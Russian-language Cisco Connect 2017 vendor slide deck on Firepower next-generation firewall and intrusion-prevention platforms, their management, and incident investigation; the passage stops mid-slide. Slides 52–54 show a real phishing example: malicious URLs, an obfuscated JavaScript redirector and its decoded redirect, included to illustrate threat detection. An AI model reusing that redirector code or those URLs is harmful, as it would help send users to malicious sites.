Василий Томилин Инженер-консультант, Cisco

1. Cisco
Connect
Москва, 2017
Цифровизация:
здесь и сейчас

2. Платформы
безопасности
очередного
поколения
Василий Томилин
Инженер-консультант, Cisco
© 2017 Cisco and/or its affiliates. All rights reserved.

3. Архитектура систем: обзор
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 3

4. Как мы строили современные платформы
безопасности
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 4
PIX
Adaptive Security Appliance (ASA)
FirePOWER NGIPS
ASA с сервисами FirePOWER?
Firepower NGFW?

5. Привычная Cisco ASA
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 5
ASDM (OnBox) / CLI
Cisco Security Manager / RESTful API для управления
HA и
кластеризация
Межсетевой экран
[Маршрутизация |
Коммутация]
Защита ЦОД
Защита сетей
операторов связи
Анализ
протоколов
Политики с учетом
идентификации
VPN
Мультиконтекстный
режим

6. Cisco ASA с сервисами FirePOWER
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 6
► Cisco ASA – самый популярный в
отрасли межсетевой экран
корпоративного класса
► Гранулярное управление работой
приложений (AVC)
► Лучшая в отрасли FirePOWER
NGIPS
► Фильтрация запросов по URL
с учетом репутации и категорий
► Технология AMP
Cisco ASA
Политики с учетом
идентификации
Фильтрация
запросов по URL
(Подписка)Аналитика и
автоматизация
(FireSIGHT)
Advanced
Malware
Protection
(Подписка)
Управление
работой
приложений
Межсетевой экран
Маршрутизация |
Коммутация
HA и
кластеризация
WWW
Аналитика Cisco в области информационной безопасности
Профилирование
узлов сети
Предотвращение
вторжений
(Подписка)

7. Firepower Threat Defense
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 7
Защита
от ВПО
Network
Profiling
АНАЛИТИКА CISCO В ОБЛАСТИ ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТИ
Фильтрация
запросов по
URL
Единый образ ПО. Одна система управления
WWW
Identity-Policy
Control
Политики
с учетом
идентификации
Профилиро-
вание узлов
сети
Аналитика и
автоматизация
Управление
работой
приложений
Предотвра-
щение
вторжений
Высокая
доступность
Межсетевой экран
(маршрутизация)

8. Программный образ Firepower Threat
Defense (FTD)
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 8
ASA (L2-L4)
• МСЭ с контролем состояния сеансов
(L2-L4)
• Масштабируемый CGNAT, ACL,
маршрутизация
• Контроль работы приложений
Firepower (L7)
• NGFW
• NGIPS, ориентированная на угрозы
• AVC, фильтрация по URL
• Технология AMP
Полный набор
функционала
Постепенная миграция
функционала
Firepower Threat Defense
Единая конвергентная ОС
МСЭ URL
Види-
мость
Угрозы
Firepower Management
Center (FMC)*
ASA с сервисами
Firepower
* Также управляет платформами Firepower и сервисами FirePOWER (не базовой ASA)

9. Сравнение функционала: ASA с сервисами
Firepower и Firepower Threat Defense
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 9
Функционал Firepower Threat Defense Сервисы Firepower для ASA
СХОДСТВА
Маршрутизация + NAT
✔
(OSPF, BGP, статика, RIP, Multicast,
EIGRP/PBR с помощью FlexConfig)
✔
(OSPF, BGP, EIGRP, статика, RIP,
Multicast)
Автономное управление ✔ ✔
Высокая доступность (A/S) ✔ ✔
Кластеризация (Active/Active) ✔ ✔
S2S VPN ✔ ✔
Использование SGT в политиках ✔ ✔
РАЗЛИЧИЯ
Унифицированные правила и объекты
ASA и Firepower
✔ ✘
Поддержка гипервизоров ✔
(AWS, VMware, KVM, Azure 6.2)
✘
Поддержка Smart Licensing ✔ ✘
Мультиконтекстность ✘(ожидаем с нетерпением!) ✔
RA VPN ✔ (6.2.1) ✔
Примечание: это, безусловно, не исчерпывающий список

10. Варианты развертывания Firepower
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 10
Платформы
Firepower
Firepower Threat Defense
(единый образ ПО)
ASA с сервисами
Firepower
Сервисы
Firepower
ASA 9.5.x
Firepower
Threat Defense
Платформы
Firepower
7000/7100/8000/VM ASA 5500X (все модели) ASA 5500X / VM
Firepower 2100 / 4100 / 9300
5585 не поддерживает
образ FTD!
Все варианты могут управляться Firepower Management Center

11. Платформы и их функциональные возможности
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 11

12. ASA 5500-X
SMB и филиалы
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 12
5506 / 5508 / 5516
Унифицированное
управление
• Интерфейсы 1 Гбит/с
• Пропускная способность до
1,2 Гбит/с (FTD, все сервисы)
• Варианты резервируемого
электропитания 5545 / 5555
• ПО Firepower Threat
Defense или ASA
• Интерфейсы 1 Гбит/с
• Пропускная способность до
450 Мбит/с (FTD, все сервисы)
• Поддержка программной
коммутации
• ПО Firepower Threat Defense
или ASA
• Firepower Management Center
(централизованное)
• Firepower Device Manager
(автономное)
• Cisco Defense Orchestrator
(облачное)
5525 / 5545 / 5555

13. Cisco Firepower серии 2100
Представляем 4 новых платформы
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 13
Оптимизация
производительности
и плотности портов
Унифицированное
управление
Специализированный
NGFW
• Встроенные механизмы
NGFW, NGIPS, управления
работой приложений (AVC),
фильтрации запросов по
URL и Cisco AMP
• Интерфейсы 1 и 10 Гбит/с
• Пропускная способность до
8,5 Гбит/с
• Форм-фактор 1 RU
• Два слота для SSD
• 12 RJ45, 4 SFP(+)
• Модели 2130 / 2140
• 1 сетевой модуль
• Опция "Fail to Wire"
• Поддержка двух БП
• Firepower Management Center
(централизованное)
• Firepower Device Manager
(автономное)
• Cisco Defense Orchestrator
(облачное)

14. Cisco Firepower серии 2100
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 14
FPR 2110 16 x 1G
FPR 2120 16 x 1G
FPR 2140 12 x 1G, 12 x 10G
Высокая производительность,
специальная архитектура Cisco NGFW
4 разных платформы
Более высокая плотность портов в
форм-факторе 1 RU
Поддержка 10 Гбит/с
Firepower
2100
Firepower
2100
Firepower
2100
FPR 2130 12 x 1G, 12 x 10G
Firepower
2100

15. Производительность Firepower серии 2100
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 15
FPR 2110 FPR 2120 FPR 2130 FPR 2140
Пропускная
способность
NGFW
1,9 Гбит/с 3 Гбит/с 4,75 Гбит/с 8,5 Гбит/с
Пропускная
способность
NGFW + IPS
1,9 Гбит/с 3 Гбит/с 4,75 Гбит/с 8,5 Гбит/с
Максимальное
число
одновременных
соединений
1 млн 1,2 млн 2 млн 3,5 млн
Максимальное
число новых
соединений
в секунду
12 000 16 000 24 000 40 000
НЕТ ПАДЕНИЯ
ПРОИЗВОДИТЕЛЬНОСТИ!

16. Особенности архитектуры 2100
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 16
• Расширенные инспекции на x86
• Базовые инспеции с контролем состояния
соединений на Octeon NPU
• Архитектура “Zero packet copy”
(преимущество единой ОС на платформе)

17. Cisco Firepower серии 4100
Высокопроизводительный кампус и ЦОД
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 17
Оптимизация
производительности
и плотности портов
Унифицированное
управление
Мультисервисная
платформа
безопасности
• Встроенные механизмы
NGFW, NGIPS, управления
работой приложений (AVC),
фильтрации запросов по
URL и Cisco AMP
• Radware vDP для защиты
от DDoS
• Поддержка ПО ASA, в
будущем – других
партнерских решений
• Интерфейсы 10 и 40 Гбит/с
• Пропускная способность до
24 Гбит/с
• Форм-фактор 1 RU
• Низкие задержки
• Firepower Management Center
(централизованное)
• Firepower Device Manager
(автономное)
• Cisco Defense Orchestrator
(облачное)

18. Платформа Cisco
Firepower 9300
Высокопроизводительный ЦОД
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 18
Преимущества
• Интеграция лучших сервисов
безопасности
• Динамическое построение
цепочек сервисов
Функционал
• Поддержка ПО ASA
• Firepower™ Threat Defense:
• NGIPS, AMP, URL, AVC
• Поддержка сторонних решений:
• Radware vDP
Преимущества
• Гибкая архитектура
Функционал
• Безопасность на базе шаблонов
• Защищенная контейнеризация
пользовательских приложений
• RESTful/JSON API
• Оркестрация и управление
с помощью сторонних систем
Функциональные
особенности
• Компактное решение (3RU)
• 10 и 40 Гбит/с; готовность к
100 Гбит/с
• Терабитная объединительная
плата
• Низкие задержки,
интеллектуальный fast path
Модульность
Решение
операторского
класса
Мультисервисная
платформа
безопасности

19. Платформы Cisco NGFW
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 19
Все платформы NGFW управляются Firepower Management Center
250 Мбит/с -> 1,75 Гбит/с
(сервисы NGFW + IPS)
Firepower Threat Defense
для ASA 5500-X
2 Гбит/с -> 8 Гбит/с
(сервисы NGFW + IPS)
Firepower серии 2100
41xx = 10 Гбит/с -> 24 Гбит/с
93xx = 24 Гбит/с -> 53 Гбит/с
Firepower серии 4100
и Firepower 9300

20. Межсетевые экраны Cisco
ASA 5555-X
ASA 5545-X
ASA 5525-X
Филиал Интернет-периметрSMB/SOHO
ASA 5585-X SSP60
ASA 5585-X SSP40
ASA 5585-X SSP20
ASA 5585-X SSP10
ЦОД Операторы связи
FPR 4110
FPR 4120
FPR 4140
FPR 4150
ASA 5506-X
ASA 5508-X
ASA 5516-X
FPR 9300 -SM-24
FPR 9300 -SM-36
FPR 9300 -SM-44
FPR серии 2100

21. Поддержка ПО на аппаратных платформах
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 21
ASA
Firepower
NGIPS
ASA
с сервисами
FirePOWER
Firepower
Threat
Defense
ASA 5506X -> 5555X (все модели) ✓ ✓ ✓
Firepower 2100 (все модели) ✓
Firepower 4100 (все модели) ✓ ✓
Firepower 9300 (все модели) ✓ ✓
ASA 5585 (с блейдом SSP) ✓ ✓
Firepower 7000 / 8000
(платформы IPS) ✓

22. Поддержка ПО в виртуальных средах
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 22
ASA
Firepower
NGIPS
Firepower Threat
Defense
vSphere ASAv NGIPSv NGFWv
AWS ASAv NGFWv
Azure ASAv NGFWv
Hyper-V ASAv
KVM ASAv NGFWv

23. Платформы управления
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 23

24. Варианты управления
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 24
Firepower Device
Manager
Простое
автономное
решение для
типовых настроек
политик и правил
обеспечения
безопасности
Полномасштабное
управление
безопасностью,
автоматизация и
аналитика для
нескольких устройств
Firepower Management
Center
Cisco Defense
Orchestrator
Централизованное
облачное
управление
политиками на
разных объектах
Автономное Централизованное Облачное

25. Firepower Device Manager
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 25
Бесплатное локальное решение для автономного управления устройством Firepower
Threat Defense
Ориентация на
рынок SMB
Простой и интуитивно
понятный интерфейс

26. Firepower Management Center
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 26
• Система централизованного управления для Firepower Threat Defense
• Также поддерживает управление устройствами Firepower и «сервисами»
• Унифицированное управление политиками для платформ Firepower
и Firepower Threat Defense
• Самый развитый функционал для платформ Firepower!
One
Rule
Table

27. Сравнение вариантов
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 27
Firepower Management Center
(централизованное)
Firepower Device Manager
(автономное)
NAT & Routing
Access Control
Intrusion & Malware
Device & Events Monitoring
VPN - Site to Site & RA
Security Intelligence
Прочие политики: SSL, Identity, Rate Limiting (QoS)
Active/Passive Authentications
Firewall Mode Routed / Transparent Routed
Threat Intelligence & Analytics
Correlation & Remediation
Risk Reports
Device Setup Wizard
Interface Port-Channel
High Availability

28. Поддержка миграции
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 28

29. Миграция конфигураций ASA -> FTD
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 29
• Новая операционная система
• Требуется конвертация старой конфигурации
• Существует утилита миграции!
• Где пробовать? Конечно, в dCloud!

30. Возможности средства миграции
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 30
• Возможности средства миграции:
 Конвертация конфигурации ASA в FTD
 Возможность загрузки политик как файла .sfo (импорт в FMC)
 Отчет о результатах миграции
• Средство миграции поддерживает правила доступа
ASA Access-Rules, политики NAT и объекты,
используемые в политиках
• Проверено с 10 000 ACE и объектов
• Версия ASA 9.1+

31. Развитие функционала Firepower NGFW
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 31

32. Усовершенствования
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 32
Дополнительные функции межсетевого экрана
Интеграция Identity
Точный анализ угроз
• ISE
• pxGrid
• VDI
Портал аутентификации
Обеспечение аутентификации
• Active/Passive
• NTLM
• Kerberos
Ограничение скорости
Управление использованием
приложений
• Пределы на
основании правил
• Отчеты
• Правила QoS
FlexConfig
Гранулярная настройка
• Политики CLI
• Управление
функционалом
ASA
Политики для туннелей
Раннее блокирование трафика
• Префильтрация
• Приоритетная
политика
• Миграция политик

33. Интеграция с ISE
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 33
pxGrid для получения от ISE:
Имя пользователя AD (поиск по группам в AD Realm)
Тип, профиль, местоположение устройства
Метка TrustSec SGT
Возможность реализовать управление на основании
множества атрибутов
Например, заблокировать использование HR личных iPad
Уменьшение объема и снижение сложности ACL

34. Копия экранов интеграции с ISE
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 34

35. Расширение возможностей AVC
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 35
OpenAppID
Обнаружение и понимание
рисков
Реализация гранулярного
контроля доступа
Приоритезация трафика,
ограничение скорости
Создание детекторов
для пользовательских
приложений
База Cisco
• > 4 000 приложений
• > 180 000 микроприл. Сеть и
пользователи







1
2
Приоритезация
трафика

36. Настройка ограничения скорости
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 36
36BRKSEC-2050
• Политика QOS – новый тип политик
• Она не связана с политикой контроля доступа

37. Поддержка OpenAppID
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 37
• Поддерживаемый сообществом
открытый язык написания детекторов
приложений
• > 2 500 детекторов созданы Cisco
• > 20 000 загрузок пакета с сентября
• Поддержка сообществом Snort
• Несложный язык (основан на
языке Lua)
• Снижение зависимости от цикла
релизов вендора
• Российский технологический
партнер – компания «Перспективный
мониторинг»

38. Обнаружение вторжений с учетом контекста и
специфики приложения (NGIPS)
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 38
Коммуникации
Приложение/устройство
01011101001
010
010001101
010010 10 10
Пакеты данных
Приоритезация
реакции
Смешанные угрозы
• Разведка
сети
• Фишинг
• «Невинные»
нагрузки
• Редкие
обращения
3
1
2
Accept
Block
Автомати-
зация
ISE
Анализ сетевого трафика
Корреляция
данных
Обнаружение скрытных угроз Отклик на основе приоритетов

39. Обнаружение вредоносного ПО
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 39
c
Репутация файла
Cisco AMP Threat Grid (Advanced Malware Protection и песочница)
• Известные сигнатуры
• Нечеткие отпечатки
• Индикаторы компрометации

Блокирование известного
вредоносного ПО
Анализ файлов
в безопасной среде
Обнаружение
новых угроз
Реакция на тревоги
Траектории в сети
и на устройстве Журнал AMP
for Network

Песочница Threat Grid
• Расширенная
аналитика
• Динамический анализ
• Аналитика угроз
?
Журнал AMP
for Endpoint
Диспозиция
Обеспечение во всей
инфраструктуре
RiskySafeUncertain
Анализ в песочнице

40. Неизвестный файл
обнаружен на IP: 10.4.10.183,
загружен через Firefox

41. В 10:57, неизвестный файл
переслан от IP 10.4.10.183 к
IP: 10.5.11.8

42. Через 7 часов файл переслан
третьему хосту (10.3.4.51)
используя SMB

43. Файл скопирован еще раз на
4-е устройство (10.5.60.66)
через тот же SMB сервис
через пол часа

44. Cisco Collective Security
Intelligence Cloud распознало
файл как вредоносный и
ретроспективное
уведомление сработало на
все 4 устройства.

45. В то же время устройство с
установленным FireAMP
endpoint connector
отреагировало на
ретроспективное событие и
мгновенно отправило в
карантин новое malware

46. Через 8 часов после первой
атаки Malware пытается
снова попасть в систему
через оригинальную точку
входа, но оно распознано и
заблокировано.

47. Защита веб-доступа
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 47
Фильтрация по URL – фиды Security Intelligence – функционал DNS Sinkhole
Классификация
более 280 млн URL
Фильтрация сайтов
по более чем 80 категориям
Простое управление
списками “allow/block”
Блокирование актуальных
вредоносных URL
Создание политик
на базе категорий
Allow Block
Админ
База данных
URL Cisco
DNS Sinkhole
01001010100
00100101101
Фиды
URL | IP | DNS
NGFW
Фильтрация
BlockAllow
Безопасный
поиск
…………
 

48. Аналитика безопасности URL
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 48
• Дополнение механизмов безопасности на базе IP
• Динамический фид TALOS, сторонние фиды и
списки
• Различные категории: вредоносное ПО, фишинг,
CnC,…
• Разные действия: Allow, Monitor, Block, Interactive
Block,…
• Настройка политик с помощью правил доступа или
черного списка
• Теги IoC для URL CnC и вредоносного ПО
• Новый виджет для URL SI
• Помещение URL-адреса в черный/белый список с
помощью одного щелчка
Категории
URL-SI

49. Контроль зашифрованного трафика
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 49
Поддержка различных вариантов
расшифровки
Анализ сертификата при установлении соединения SSL TLS и расшифровка TLS
Журналирование
Ядро
расшифровки SSL
Обеспечение
политики
Зашифрованный
трафик
AVC
http://www.%$&^*#$@#$.com
http://www.%$&^*#$@#$.com
Анализ расшифрованных пакетов
Контроль и журналирование
всех SSL-сеансов
NGIPS
gambling
elicit
http://www.%$*#$@#$.com
http://www.%$*#$@#$.com
http://www.%$*#$@#$.com
http://www.%$*#$@#$.com
http://www.%$*#$@#$.com
http://www.%$*#$@#$.com
http://www.%$*#$@#$.com
http://www.%$*#$@#$.com
http://www.%$*#$@#$.com
http://www.%$*#$@#$.com











50. Анализ DNS-трафика
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 50
• Поддержка аналитики безопасности для
доменов
• Решение вопросов, связанных с доменами
fast-flux
• Предоставляемые Cisco и определяемые
пользователем (либо выбранные внешние)
фиды DNS: CnC, спам, вредоносное ПО,
фишинг
• Разные действия: Block, Domain Not Found,
Sinkhole, Monitor
• IoC дополнены данными, основанными на
анализе DNS-трафика
• Новый виджет для SI DNS
Список Действие

51. Действие DNS Sinkhole
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 51
Локальный DNS-сервер
SinkholeXПодключение к IP-адресу Sinkhole
Политика NGFW
DNS SI: серверы C&C
Действие: DNS Sinkhole
Создание событий SI и IoC
Зараженный
ПК
(10.15.0.21)

52. Что происходит в жизни
Фишинговая ссылка:
http://www.linkedin.com/do?action=viewMessage&q=member&id=46258219
Реальная ссылка:
http://dixontax.com/wp-content/angle.php
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 52

53. Что по ссылке
А по ссылке несложный код:
<html><head><meta name="keywords" content="circles, suspended, history,
phrases"><title>plotted32135 Will - him - human renderd, hell - grizzly feeding.
coming.</title><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-
1"></head>
<body>
<script type="text/javascript">function nexte() { nexta=65;
nextb=[184,170,175,165,176,184,111,181,176,177,111,173,176,164,162,181,170,176,175,11
1,169,179,166,167,126,104,169,181,181,177,123,112,112,163,179,162,170,175,180,185,16
9,176,177,180,111,164,176,174,112,128,162,126,117,113,114,116,116,119,103,164,126,164,
177,164,103,180,126,113,118,113,115,114,120,104,124];
nextc=""; for(nextd=0;nextd<nextb.length;nextd++) {
nextc+=String.fromCharCode(nextb[nextd]-nexta); } return nextc; }
setTimeout(nexte(),1299);
</script>
</body>
</html>
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 53

54. Что получится при запуске функции?
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 54
window.top.location.href='http://brainsxhops.com/?a=401336&c=cpc&s=050217';
Изначально было: http://dixontax.com/wp-content/angle.php

55. Кстати, что мы знаем про dixontax.com
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 55

56. А что известно про brainsxhops.com?
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 56

57. Firepower в действии
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 57

58. Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 58
Понимаете ли вы, что такое Firepower Manager?
Только ли это:
Средство настройки политик NGFW / NGIPS
Средство для быстрой оценки контекста/
состояния вашей сети
Средство для «просмотра»
событий IPS

59. Достижение большего результата, чем
«просто защита от угроз»
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 59
Firepower Management Center (FMC) управляет обнаружением угроз. А также:
• Помещает угрозу в контекст ВАШЕЙ уникальной сети.
• Формирует actionable-данные для ИБ, ИТ и бизнеса
• Обеспечивает автоматизацию борьбы с угрозами

60. Визуальная схема источников событий
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 60
Аналитика
ИБ
Аналитика
ИБ
Ядро IPS
(Snort®)
Нормализация
трафика
DNS
Sinkhole
Расш.
SSL
Обнар.
файлов
Обнаруж.
прилож.
Контроль
сети
AMPURL Identity
События
Intrusion
События
File
События
Malware
Действия
пользоват.
Профили
хостов
Приложения
Детали
приложений
Атрибуты
хостов
Серверы
Траектория
файлов
File
AMP 4
Endpoints
События
Discovery
События
Connection
Индикаторы
компрометации
Доп. данные
• Данные Geo IP
• Данные CVE / Vuln
• Данные IP-
репутации
• Данные о URL

61. Индикаторы компрометации
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 61
Основаны на корреляции событий разных типов:
• События с Impact 1 и 2
• Обращения к CNC (IPS)
• События компрометации (IPS)
• События, связанные с SI
• События AMP for Endpoint
• События AMP for Network
• Встроенные правила
корреляции
Цель:
1. ТРЕБУЕТСЯ ВМЕШАТЕЛЬСТВО
2. Что требует внимания
3. Как действовать

62. Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 62
(установлен)
Тестирование структуры и контента
Профиль хоста
• Пассивный сбор данных
• Таблица “состояний” на базе событий Discovery
• Сервер: TCP-ответы на подключения
UDP-ответы на UDP-пакеты
• Приложения (обычно TCP)
определяются в начале сеанса
Ответ на TCP-запрос = порт
сервера
UDP… мы зависим от 1 пакета
• В правилах Snort® «направление» определяется
переменными
• $EXTERNAL_NET -> $HOME_NET (входящее)
• $HOME_NET -> $EXTERNAL_NET (исходящее)
• TCP-события ядра Snort® основаны на
УСТАНОВЛЕННЫХ сеансах
• Снижение числа ложных срабатываний
«Направление» - это
ключ к флагам Impact
Событие вторжения

63. Профиль хоста
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 63
Приложения
BRKSEC- 63

64. Понимание флагов Impact
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 64
События Intrusion
IP отправителя/
получателя
Протокол (TCP/UDP)
Порт отправителя/
получателя
Сервис
ИД Snort
IOC: заложенный
Impact
Профиль хоста
[Вне профилирования]
[Хост еще не профилирован]
IP-адрес
Протоколы
Порты сервера
Порты клиента
ИД пользователя
Потенциальные уязвимости
Сервисы
Приложения
Операционная система
CVE
0
4
2
3
1
Action Why
Общие данные
Событие вне
профил. сетей
Событие вне
профил. сетей
Сведения о
хосте пока не
сформированы
Новый хост в
контролируемой
сети
Подключение не
установлено
Порт не
открыт/протокол
не используется
Требует
расследования.
Хост под
воздействием.
Порт/протокол
активен, но
уязвимости не
определены
Требует
реакции.
Хост уязвим или
взломан.
Хост уязвим для
активной атаки
или есть IOC.
Флаг Impact

65. Порядок действий †
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 65
Устранение – реакция на инцидент – сбор данных
†может изменяться в соответствии с политикой
IoC
У вас «гости»! Атака активна Анализ и настройки
Impact 0 Impact 1 Impact 2, 3 Impact 4
“Критический
ресурс”
Не
заблокировано
Внутренний
источник
Внешний
источник
Нейтрали-
зовано
Правила
корреляции
Цель: устранение

66. Реальный мир
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 66
Копия экрана FMC Context Explorer
Начнем с этих 63
событий.
ТЕМА: начните с компрометации.
Варианты выбора
• Запуск ВПО (Endpoint AMP)
• «Дроппер» (Endpoint AMP)
• Угроза при передаче файла
• Подключение к CNC
• Запуск шелл-кода
• Impact 1 (может быть, заблокировано)
• Impact 2 (может быть, заблокировано)

67. Погружение в IoC
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 67
Интенсивный процесс. На
него стоит посмотреть
внимательно.

68. Погружение в IoC
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 68
Похоже, затронуты 6 хостов.
Проанализируем один.

69. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
✔
✔
✔
✔
Похоже, на
Windows-
машине Kim
Ralls много
интересного.
Источники событий:
• Ядро IPS
• Анализ файлов
• AMP for Networks

70. Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 70

71. Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 71

72. Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 72

73. Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 73

74. Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 74
• .147 отправлял файл 5 раз
• .147 мог получить файл 1 раз
• IPS заблокировала всё! (смайл)
• Почему Impact 4?
• Стоит ли ещё посмотреть?

75. Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 75
✔
Помните про эти
вкладки?
Посмотрим, не
передавался ли
файл «мимо»
IPS.
✔
✔
✔

76. Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 76
Да. Файл
вредоносный
И в сводке
вредоносного ПО
он указан.

77. Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 77
• Гораздо больше
фактов передачи,
и больше
пораженных хостов.
• Хорошая новость:
у нас был AMP for
Endpoints.
• Плохая новость:
карантин не был
включен.
• Область поражения
известна. Пора
действовать!
• Может быть, стоит
воспользоваться
Threatgrid, чтобы
оценить артефакты

78. Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 78
• Гораздо больше
фактов передачи,
и больше
пораженных хостов.
• Хорошая новость:
у нас был AMP for
Endpoints.
• Плохая новость:
карантин не был
включен.
• Область поражения
известна. Пора
действовать!
• Может быть, стоит
воспользоваться
Threatgrid, чтобы
оценить артефакты
Выводы
Рассмотрите все обстоятельства,
связанные с событием. Постарайтесь
сформировать законченный
сценарий и определить все нюансы

79. Посмотрим на Impact 3
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 79

80. Посмотрим на Impact 3
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 80
• IP-адрес отправителя: только внутренние,

81. Посмотрим на Impact 3
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 81
• IP-адрес отправителя: только внутренние,
• IP-адрес получателя: только внешние,

82. Посмотрим на Impact 3
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 82
• IP-адрес отправителя: только внутренние,
• IP-адрес получателя: только внешние,
• Impact 3: профили внешних хостов отсутствуют

83. Посмотрим на Impact 3
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 83
• IP-адрес отправителя: только внутренние,
• IP-адрес получателя: только внешние,
• Impact 3: профили внешних хостов отсутствуют,
• Источником является моя сеть – я атакующий - IoC

84. Посмотрим на Impact 3
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 84
• IP-адрес отправителя: только внутренние,
• IP-адрес получателя: только внешние,
• Impact 3: профили внешних хостов отсутствуют,
• Источником является моя сеть – я атакующий – IoC
• TCP-параметры определены – соединение было установлено.
Хосты инициировали атаку. Посмотрим на исходный хост.

85. Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 85

86. Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 86
Результат:
Необходимо это
прекратить!

87. Безопасность нарушена?
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 87
Различные вектора событий Критически важный ресурс?
IPS, ВПО, сеансы, файлы,
траектория, DNS,
Контекст
Корреляция, IOC,
флаги Impact
Анализируйте все данные. «Направление»
события
Протокол: TCP /
UDP?
Ознакомьтесь с документацией
на правило
“Старайтесь увидеть картину” :
дамп может не потребоваться
Создайте логичный
и полный сценарий.

88. Как упростить себе жизнь и концентрироваться
на безопасности
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 88

89. Правила и политики корреляции
Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 89
Правила корреляции
позволяют применять
БУЛЕВУ алгебру к наборам
данных в консоли Firepower.
Правила можно связать с
действиями: Email, Syslog,
SNMP или нейтрализация.
Email
Syslog
SNMP
Модуль нейтрализации
5 000 событий
500 событмй
20 событий
10 событий
3
события
Политика
Правило
Правило
Событие
Действие
100 событий

90. Cisco Connect 2017 © 2017 Cisco and/or its affiliates. All rights reserved. 90
Пример правила
Мы хотим:
• Обеспечить только HTTPS-
трафик по порту 443
• Трафик должен
инициироваться хостом в
заданном местоположении
(атрибут хоста), и это POS
• HTTPS-трафик должен быть
